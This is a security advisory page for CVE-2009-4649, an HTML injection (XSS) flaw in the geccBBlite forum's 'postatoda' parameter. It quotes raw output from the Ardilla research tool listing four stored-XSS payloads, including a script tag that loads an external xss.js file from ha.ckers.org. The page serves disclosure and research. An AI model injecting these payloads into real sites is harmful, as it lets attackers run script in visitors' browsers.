geccBBlite 'postatoda' Parameter Multiple HTML Injection Vulnerabilities

2010.02.25
Credit: Adam Kiezun, Philip J. Guo, Karthick Jayaraman, and Michael D. E
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2009-4649
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

//START ATTACKS FOUND -------------------------------- SECOND ORDER ATTACK /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/scrivi.php vulnerability at UNKNOWN SITE Input: postatoda="<A HREF="http://ha.ckers.org@google">XSS</A>" testo="1" testonuovo="1" titolo="1" /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/scrivi.php vulnerability at line:14 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/forum.php Input:<empty> -------------------------------- SECOND ORDER ATTACK /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/scrivi.php vulnerability at UNKNOWN SITE Input: postatoda="<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">" testo="1" testonuovo="1" titolo="1" /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/scrivi.php vulnerability at line:16 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/forum.php Input:<empty> -------------------------------- SECOND ORDER ATTACK /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/scrivi.php vulnerability at UNKNOWN SITE Input: postatoda="<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>" testo="1" testonuovo="1" titolo="1" /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/scrivi.php vulnerability at line:32 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/forum.php Input: azione="espandi" -------------------------------- SECOND ORDER ATTACK /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/scrivi.php vulnerability at UNKNOWN SITE Input: postatoda="<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>" testo="1" testonuovo="1" titolo="1" /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/scrivi.php vulnerability at line:34 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite/forum.php Input: azione="espandi" //END ATTACKS FOUND attack count:4 pcLen:12.0 coveredEchos:17 coveredTaintedEchos:5 no more inputs to explore time:229725

References:

http://xforce.iss.net/xforce/xfdb/56278
http://www.securityfocus.com/bid/35449
http://groups.csail.mit.edu/pag/ardilla/geccbblite-XSS2-strict-T.txt
http://groups.csail.mit.edu/pag/ardilla/geccbblite-XSS2-lenient-T.txt
http://groups.csail.mit.edu/pag/ardilla/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top